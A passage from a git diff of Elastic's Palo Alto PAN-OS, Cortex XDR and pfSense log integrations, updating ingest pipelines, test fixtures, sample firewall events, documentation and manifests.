16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domain..name\\\\src-user#name,dst_domain..name\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src-user#name", + "dst-user#name" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src_domain..name", + "name": "src-user#name" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src_domain..name", + "name": "src-user#name" + } } ] -} \ No newline at end of file +} diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json index 296d626837e..de50a67d466 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json @@ -37195,7 +37195,6 @@ "start": "2023-10-04T09:50:19.000Z", "timezone": "UTC", "type": [ - "denied", "denied", "connection" ] @@ -37739,4 +37738,4 @@ ] } ] -} \ No newline at end of file +} diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json index a0ef131c8c3..60d5eb48c6b 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-tunnel-inspection-sample.log-expected.json @@ -174,6 +174,9 @@ "name": "rule1", "uuid": "100" }, + "session": { + "start_time": "1000-01-01T00:00:00.000Z" + }, "source": { "bytes": 10, "geo": { diff --git a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml index 076db95d445..e5fdf147e69 100644 --- a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml +++ b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/config.yml @@ -4,7 +4,25 @@ description: Pipeline for PanOS Config Logs. processors: - csv: field: message + target_fields: + - panw.panos.host.ip + - panw.panos.virtual_sys + - panw.panos.cmd + - panw.panos.admin + - panw.panos.client_type + - panw.panos.result + - panw.panos.path + - _temp_.check_field + - convert: + field: _temp_.check_field + type: long + ignore_missing: true ignore_failure: true + - csv: + field: message + trim: true + tag: panw.panos.config_parse_custom + if: "!(ctx._temp_?.check_field instanceof Number)" target_fields: - panw.panos.host.ip - panw.panos.virtual_sys @@ -25,7 +43,33 @@ processors: - panw.panos.device_name - panw.panos.device_group_id - panw.panos.comment - + - _temp_.future_use1 + - _temp_.high_res_timestamp + - csv: + field: message + trim: true + tag: panw.panos.config_parse_standard + if: "ctx._temp_?.check_field instanceof Number" + target_fields: + - panw.panos.host.ip + - panw.panos.virtual_sys + - panw.panos.cmd + - panw.panos.admin + - panw.panos.client_type + - panw.panos.result + - panw.panos.path + - panw.panos.sequence_number + - panw.panos.action_flags + - panw.panos.device_group_hierarchy1 + - panw.panos.device_group_hierarchy2 + - panw.panos.device_group_hierarchy3 + - panw.panos.device_group_hierarchy4 + - panw.panos.vsys_name + - panw.panos.device_name + - panw.panos.device_group_id + - panw.panos.comment + - _temp_.future_use1 + - _temp_.high_res_timestamp - script: description: Set Event Action. lang: painless diff --git a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml index 73139b92cc1..7122b773f2e 100644 --- a/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml +++ b/packages/panw/data_stream/panos/elasticsearch/ingest_pipeline/default.yml @@ -104,24 +104,26 @@ processors: field: _temp_.srcuser ignore_missing: true patterns: - - '^%{HOSTNAME:source.user.domain}\\%{USERNAME:source.user.name}$' - - '^%{HOSTNAME:source.user.domain}\\\\%{USERNAME:source.user.name}$' - - '^%{USERNAME:source.user.name}@%{HOSTNAME:source.user.domain}$' + - '^%{PATRUNKATEDHOSTNAME:source.user.domain}\\%{USERNAME:source.user.name}$' + - '^%{PATRUNKATEDHOSTNAME:source.user.domain}\\\\%{USERNAME:source.user.name}$' + - '^%{USERNAME:source.user.name}@%{PATRUNKATEDHOSTNAME:source.user.domain}$' - '^%{USERNAME:source.user.name}$' pattern_definitions: - USERNAME: '[ a-zA-Z0-9._-]+[$]?' + USERNAME: '[ a-zA-Z0-9#.:_\-]+[$]?' + PATRUNKATEDHOSTNAME: '(?:\.{0,1}|\b(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62})(?:\.{1,2}(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62}))*(\.?|\b))' if: ctx._temp_?.srcuser != null - grok: field: _temp_.dstuser ignore_missing: true patterns: - - '^%{HOSTNAME:destination.user.domain}\\%{USERNAME:destination.user.name}$' - - '^%{HOSTNAME:destination.user.domain}\\\\%{USERNAME:destination.user.name}$' - - '^%{USERNAME:destination.user.name}@%{HOSTNAME:destination.user.domain}$' + - '^%{PATRUNKATEDHOSTNAME:destination.user.domain}\\%{USERNAME:destination.user.name}$' + - '^%{PATRUNKATEDHOSTNAME:destination.user.domain}\\\\%{USERNAME:destination.user.name}$' + - '^%{USERNAME:destination.user.name}@%{PATRUNKATEDHOSTNAME:destination.user.domain}$' - '^%{USERNAME:destination.user.name}$' pattern_definitions: - USERNAME: '[ a-zA-Z0-9._-]+[$]?' + USERNAME: '[ a-zA-Z0-9#.:_\-]+[$]?' + PATRUNKATEDHOSTNAME: '(?:\.{0,1}|\b(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62})(?:\.{1,2}(?:[0-9A-Za-z_][0-9A-Za-z_\-]{0,62}))*(\.?|\b))' if: ctx._temp_?.dstuser != null - set: @@ -330,6 +332,22 @@ processors: - append: field: error.message value: '{{{_ingest.on_failure_message}}}' + - set: + if: ctx.panw?.panos?.parent_session?.start_time != null + field: session.start_time + value: '{{{panw.panos.parent_session.start_time}}}' + +# Remove NAT fields when translation was not done. + - remove: + field: + - source.nat.ip + - source.nat.port + if: ctx.source?.nat?.ip == '0.0.0.0' && ctx.source.nat.port == '0' + - remove: + field: + - destination.nat.ip + - destination.nat.port + if: ctx.destination?.nat?.ip == '0.0.0.0' && ctx.destination.nat.port == '0' # convert IP fields as the output of the CSV processor is always a string. - convert: @@ -1152,6 +1170,7 @@ processors: if: ctx.panw?.panos?.sub_type == 'drop' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -1162,6 +1181,7 @@ processors: if: ctx.panw?.panos?.sub_type == 'deny' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -1494,6 +1514,11 @@ processors: allow_duplicates: false value: '{{{destination.user.name}}}' if: ctx.destination?.user?.name != null + - append: + field: related.user + allow_duplicates: false + value: '{{{panw.panos.admin}}}' + if: ctx.panw?.panos?.admin != null - append: field: related.hash allow_duplicates: false @@ -1546,17 +1571,6 @@ processors: - _temp_ - _conf ignore_missing: true -# Remove NAT fields when translation was not done. - - remove: - field: - - source.nat.ip - - source.nat.port - if: ctx.source?.nat?.ip == '0.0.0.0' && ctx.source.nat.port == 0 - - remove: - field: - - destination.nat.ip - - destination.nat.port - if: ctx.destination?.nat?.ip == '0.0.0.0' && ctx.destination.nat.port == 0 # Remove panw.panos fields that are copied into an ECS field. - remove: diff --git a/packages/panw/data_stream/panos/fields/fields.yml b/packages/panw/data_stream/panos/fields/fields.yml index 4f5131916f6..28a4e43064b 100644 --- a/packages/panw/data_stream/panos/fields/fields.yml +++ b/packages/panw/data_stream/panos/fields/fields.yml @@ -1043,3 +1043,6 @@ type: boolean - name: x_forwarded_for type: boolean +- name: session.start_time + type: date + description: Time of session start. diff --git a/packages/panw/data_stream/panos/sample_event.json b/packages/panw/data_stream/panos/sample_event.json index 930e6f7d2a6..8e0fe3af61b 100644 --- a/packages/panw/data_stream/panos/sample_event.json +++ b/packages/panw/data_stream/panos/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2012-04-10T04:39:56.000Z", "agent": { - "ephemeral_id": "3a362c46-abee-4440-bd82-f0e41a651188", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "be1891e7-30b4-4f85-b31e-e719ee92c1ea", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "data_stream": { "dataset": "panw.panos", @@ -34,9 +34,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "url_filtering", @@ -48,7 +48,7 @@ ], "created": "2012-10-30T09:46:12.000Z", "dataset": "panw.panos", - "ingested": "2023-09-26T16:43:58Z", + "ingested": "2024-03-11T17:57:37Z", "kind": "alert", "original": "<14>Nov 30 16:09:08 PA-220 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "outcome": "success", @@ -68,7 +68,7 @@ "log": { "level": "informational", "source": { - "address": "192.168.80.7:47488" + "address": "172.18.0.4:53212" }, "syslog": { "facility": { @@ -135,8 +135,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -169,4 +168,4 @@ "user": { "name": "crusher" } -} +} \ No newline at end of file diff --git a/packages/panw/docs/README.md b/packages/panw/docs/README.md index aad92bf0210..1ab8906abfa 100644 --- a/packages/panw/docs/README.md +++ b/packages/panw/docs/README.md @@ -12,6 +12,8 @@ This integration is for Palo Alto Networks PAN-OS firewall monitoring logs recei - This integration supports logs of Tunnel Inspection for PAN-OS version 9.1 or above. +- This integration supports logs of configuration changes with and without details about the changed configuration(`before-change-detail` and `after-change-detail`). Please read [Note](#note) for more details. + - This module has been tested with logs generated by devices running PAN-OS versions 7.1 to 11.0. ## Configurations @@ -23,6 +25,8 @@ To configure syslog monitoring, please follow the steps mentioned in the [_Confi - It can be found under Advanced Options and can be configured as per requirements. The default value of `max_message_size` is set to 50KiB. - If the TCP input is used, it is recommended that PAN-OS is configured to send syslog messages using the IETF (RFC 5424) format. In addition, RFC 6587 framing (Octet Counting) will be enabled by default on the TCP input. +- If you want to see the configuration before and after the change(fields `before-change-detail` and `after-change-detail`) in the [config-log](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/config-log-fields), please use the following [custom log format in the syslog server profile](https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-admin/monitoring/use-syslog-for-monitoring/syslog-field-descriptions/custom-logevent-format): + ``1,$receive_time,$serial,$type,$subtype,2561,$time_generated,$host,$vsys,$cmd,$admin,$client,$result,$path,$before-change-detail,$after-change-detail,$seqno,$actionflags,$dg_hier_level_1,$dg_hier_level_2,$dg_hier_level_3,$dg_hier_level_4,$vsys_name,$device_name,$dg_id,$comment,0,$high_res_timestamp`` ## Logs @@ -36,11 +40,11 @@ An example event for `panos` looks as following: { "@timestamp": "2012-04-10T04:39:56.000Z", "agent": { - "ephemeral_id": "3a362c46-abee-4440-bd82-f0e41a651188", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "be1891e7-30b4-4f85-b31e-e719ee92c1ea", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "data_stream": { "dataset": "panw.panos", @@ -69,9 +73,9 @@ An example event for `panos` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "bf959e04-184d-48cb-92c0-4f7f748a2cc0", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "url_filtering", @@ -83,7 +87,7 @@ An example event for `panos` looks as following: ], "created": "2012-10-30T09:46:12.000Z", "dataset": "panw.panos", - "ingested": "2023-09-26T16:43:58Z", + "ingested": "2024-03-11T17:57:37Z", "kind": "alert", "original": "<14>Nov 30 16:09:08 PA-220 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,\"lorexx.cn/loader.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "outcome": "success", @@ -103,7 +107,7 @@ An example event for `panos` looks as following: "log": { "level": "informational", "source": { - "address": "192.168.80.7:47488" + "address": "172.18.0.4:53212" }, "syslog": { "facility": { @@ -170,8 +174,7 @@ An example event for `panos` looks as following: "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -205,7 +208,6 @@ An example event for `panos` looks as following: "name": "crusher" } } - ``` **Exported fields** @@ -654,6 +656,7 @@ An example event for `panos` looks as following: | server.port | Port of the server. | long | | server.user.name | Short name or login of the user. | keyword | | server.user.name.text | Multi-field of `server.user.name`. | match_only_text | +| session.start_time | Time of session start. | date | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.as.organization.name | Organization name. | keyword | diff --git a/packages/panw/manifest.yml b/packages/panw/manifest.yml index 8a2f31b1636..3f469f4b199 100644 --- a/packages/panw/manifest.yml +++ b/packages/panw/manifest.yml @@ -1,9 +1,9 @@ name: panw title: Palo Alto Next-Gen Firewall -version: "3.21.2" +version: "3.24.2" description: Collect logs from Palo Alto next-gen firewalls with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: [security, network] conditions: kibana: diff --git a/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml b/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml index dd6c2a4d2c2..c1c470dc7c6 100644 --- a/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml +++ b/packages/panw_cortex_xdr/_dev/deploy/docker/http-mock-config.yml @@ -170,13 +170,8 @@ rules: headers: Content-Type: - application/json - body: >- + body: |- { - - - - - "reply": { "total_count": 390, "result_count": 1, diff --git a/packages/panw_cortex_xdr/changelog.yml b/packages/panw_cortex_xdr/changelog.yml index aac02ff3feb..b1753f9e9b5 100644 --- a/packages/panw_cortex_xdr/changelog.yml +++ b/packages/panw_cortex_xdr/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.25.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.24.2" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9175 - version: "1.24.1" changes: - description: Changed owners diff --git a/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml index f55bb770671..669d88bcc9c 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/panw_cortex_xdr/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml @@ -22,7 +22,7 @@ processors: field: event.original target_field: panw_cortex.xdr - drop: - if: ctx.panw_cortex?.xdr?.reply?.result_count != null && ctx.panw_cortex?.xdr?.reply?.result_count == 0 + if: ctx.panw_cortex?.xdr?.reply?.result_count == 0 - fingerprint: fields: - panw_cortex.xdr.events.event_timestamp @@ -113,16 +113,16 @@ processors: field: panw_cortex.xdr.description target_field: event.reason ignore_missing: true - if: "ctx.panw_cortex?.xdr?.description != null && ctx.panw_cortex.xdr.description instanceof String" + if: ctx.panw_cortex?.xdr?.description instanceof String - rename: field: panw_cortex.xdr.description target_field: panw_cortex.xdr.bioc_description ignore_missing: true - if: "ctx.event?.reason == null && ctx.panw_cortex?.xdr?.description != null && ctx.panw_cortex?.xdr?.description instanceof List" + if: ctx.event?.reason == null && ctx.panw_cortex?.xdr?.description instanceof List - set: field: event.reason value: Bioc Event - if: "ctx.event?.reason == null && ctx.panw_cortex?.xdr?.bioc_description != null" + if: ctx.event?.reason == null && ctx.panw_cortex?.xdr?.bioc_description != null - rename: field: panw_cortex.xdr.agent_device_domain target_field: host.domain @@ -189,26 +189,26 @@ processors: description: "Extract Mitre Techniques and append it to Threat ECS fields" source: |- void addTechnique(def ctx, def x, def y) { - if (ctx?.threat == null) { + if (ctx.threat == null) { ctx.threat = new HashMap(); } - if (ctx?.threat.technique == null) { + if (ctx.threat.technique == null) { ctx.threat.technique = new HashMap(); } - if (ctx?.threat.technique.id == null) { + if (ctx.threat.technique.id == null) { ctx.threat.technique.id = new ArrayList(); } - if (ctx?.threat.technique.name == null) { + if (ctx.threat.technique.name == null) { ctx.threat.technique.name = new ArrayList(); } - if (!ctx.threat?.technique?.id.contains(x)) { + if (!ctx.threat.technique.id.contains(x)) { ctx.threat.technique.id.add(x); } - if (!ctx.threat?.technique?.name.contains(y)) { + if (!ctx.threat.technique.name.contains(y)) { ctx.threat.technique.name.add(y); } } - for (mitre_technique in ctx.panw_cortex?.xdr?.mitre_technique_id_and_name) { + for (mitre_technique in ctx.panw_cortex.xdr.mitre_technique_id_and_name) { addTechnique(ctx, mitre_technique.splitOnToken(' - ')[0], mitre_technique.splitOnToken(' - ')[1]); } - script: @@ -217,32 +217,32 @@ processors: description: "Extract Mitre Tactics and append it to Threat ECS fields" source: |- void addTactic(def ctx, def x, def y) { - if (ctx?.threat == null) { - ctx.threat = new HashMap(); + if (ctx.threat == null) { + ctx.threat = new HashMap(); } - if (ctx?.threat.tactic == null) { - ctx.threat.tactic = new HashMap(); + if (ctx.threat.tactic == null) { + ctx.threat.tactic = new HashMap(); } - if (ctx?.threat.tactic.id == null) { - ctx.threat.tactic.id = new ArrayList(); + if (ctx.threat.tactic.id == null) { + ctx.threat.tactic.id = new ArrayList(); } - if (ctx?.threat.tactic.name == null) { - ctx.threat.tactic.name = new ArrayList(); + if (ctx.threat.tactic.name == null) { + ctx.threat.tactic.name = new ArrayList(); } - if (!ctx.threat?.tactic?.id.contains(x)) { - ctx.threat.tactic.id.add(x); + if (!ctx.threat.tactic.id.contains(x)) { + ctx.threat.tactic.id.add(x); } - if (!ctx.threat?.tactic?.name.contains(y)) { - ctx.threat.tactic.name.add(y); + if (!ctx.threat.tactic.name.contains(y)) { + ctx.threat.tactic.name.add(y); } } - for (mitre_tactic in ctx.panw_cortex?.xdr?.mitre_tactic_id_and_name) { - addTactic(ctx, mitre_tactic.splitOnToken(' - ')[0], mitre_tactic.splitOnToken(' - ')[1]); + for (mitre_tactic in ctx.panw_cortex.xdr.mitre_tactic_id_and_name) { + addTactic(ctx, mitre_tactic.splitOnToken(' - ')[0], mitre_tactic.splitOnToken(' - ')[1]); } - set: field: threat.framework value: "MITRE ATT&CK" - if: "ctx.threat?.technique != null || ctx.threat?.tactic != null" + if: ctx.threat?.technique != null || ctx.threat?.tactic != null #The Action actor is an an activity that took place and was recorded by the agent. - convert: field: panw_cortex.xdr.events.action_remote_ip @@ -417,11 +417,11 @@ processors: - set: field: user.email copy_from: panw_cortex.xdr.events.user_name - if: "ctx.panw_cortex?.xdr?.events?.user_name != null && (ctx.panw_cortex?.xdr?.events?.user_name instanceof String) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('@')) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('.'))" + if: ctx.panw_cortex?.xdr?.events?.user_name instanceof String && ctx.panw_cortex.xdr.events.user_name.contains('@') && ctx.panw_cortex.xdr.events.user_name.contains('.') - set: field: user.id copy_from: panw_cortex.xdr.events.user_name - if: "ctx.panw_cortex?.xdr?.events?.user_name != null && (ctx.panw_cortex?.xdr?.events?.user_name instanceof String) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('@')) && (ctx.panw_cortex?.xdr?.events?.user_name.contains('.'))" + if: ctx.panw_cortex?.xdr?.events?.user_name instanceof String && ctx.panw_cortex.xdr.events.user_name.contains('@') && ctx.panw_cortex.xdr.events.user_name.contains('.') - remove: field: panw_cortex.xdr.events.user_name ignore_missing: true @@ -448,15 +448,15 @@ processors: - set: field: email.subject copy_from: panw_cortex.xdr.events.fw_email_subject - if: "ctx?.panw_cortex.xdr?.events?.fw_email_subject != null" + if: ctx.panw_cortex.xdr?.events?.fw_email_subject != null - append: field: email.from.address value: "{{{panw_cortex.xdr.events.fw_email_sender}}}" - if: "ctx?.panw_cortex.xdr?.events?.fw_email_sender != null" + if: ctx.panw_cortex.xdr?.events?.fw_email_sender != null - append: field: email.to.address value: "{{{panw_cortex.xdr.events.fw_email_recipient}}}" - if: "ctx?.panw_cortex.xdr?.events?.fw_email_recipient != null" + if: ctx.panw_cortex.xdr?.events?.fw_email_recipient != null - geoip: field: source.ip target_field: source.geo @@ -558,7 +558,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml b/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml index 82d8943c705..2d95741ed64 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml +++ b/packages/panw_cortex_xdr/data_stream/alerts/manifest.yml @@ -19,12 +19,13 @@ streams: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: api_token - type: text + type: password title: Palo Alto Cortex XDR API Token multi: false required: true show_user: true description: API token from the XDR UI. + secret: true - name: token_id type: text title: Palo Alto Cortex XDR API Token ID @@ -33,6 +34,7 @@ streams: show_user: true default: 1 description: The token ID related to the above API token + secret: false - name: advanced_sec_level type: bool title: Advanced security level diff --git a/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml b/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml index 2df1e4335a4..d243809102b 100644 --- a/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml +++ b/packages/panw_cortex_xdr/data_stream/incidents/elasticsearch/ingest_pipeline/default.yml @@ -123,7 +123,7 @@ processors: ctx.threat.technique.name.add(y); } } - for (mitre_technique in ctx.panw_cortex?.xdr?.mitre_techniques_ids_and_names) { + for (mitre_technique in ctx.panw_cortex.xdr.mitre_techniques_ids_and_names) { addTechnique(ctx, mitre_technique.splitOnToken(' - ')[0], mitre_technique.splitOnToken(' - ')[1]); } - script: @@ -151,7 +151,7 @@ processors: ctx.threat.tactic.name.add(y); } } - for (mitre_tactic in ctx.panw_cortex?.xdr?.mitre_tactics_ids_and_names) { + for (mitre_tactic in ctx.panw_cortex.xdr.mitre_tactics_ids_and_names) { addTactic(ctx, mitre_tactic.splitOnToken(' - ')[0], mitre_tactic.splitOnToken(' - ')[1]); } - set: @@ -202,7 +202,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml b/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml index daa36819377..5c382801ed0 100644 --- a/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml +++ b/packages/panw_cortex_xdr/data_stream/incidents/manifest.yml @@ -19,12 +19,13 @@ streams: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: api_token - type: text + type: password title: Palo Alto Cortex XDR API Token multi: false required: true show_user: true description: API token from the XDR UI. + secret: true - name: token_id type: text title: Palo Alto Cortex XDR API Token ID @@ -33,6 +34,7 @@ streams: show_user: true default: 1 description: The token ID related to the above API token + secret: false - name: advanced_sec_level type: bool title: Advanced security level diff --git a/packages/panw_cortex_xdr/manifest.yml b/packages/panw_cortex_xdr/manifest.yml index 051aab2cb91..2cb7d9987d4 100644 --- a/packages/panw_cortex_xdr/manifest.yml +++ b/packages/panw_cortex_xdr/manifest.yml @@ -1,13 +1,13 @@ name: panw_cortex_xdr title: Palo Alto Cortex XDR -version: "1.24.1" +version: "1.25.0" description: Collect logs from Palo Alto Cortex XDR with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, edr_xdr] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 icons: - src: /img/icon-cortex.svg title: Palo Alto diff --git a/packages/pfsense/_dev/deploy/docker/docker-compose.yml b/packages/pfsense/_dev/deploy/docker/docker-compose.yml index 5278b8f5801..cc6a5c267dc 100644 --- a/packages/pfsense/_dev/deploy/docker/docker-compose.yml +++ b/packages/pfsense/_dev/deploy/docker/docker-compose.yml @@ -1,19 +1,17 @@ version: '2.3' services: pfsense-log-udp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/*.log pfsense-log-tcp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log pfsense-log-tls: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: 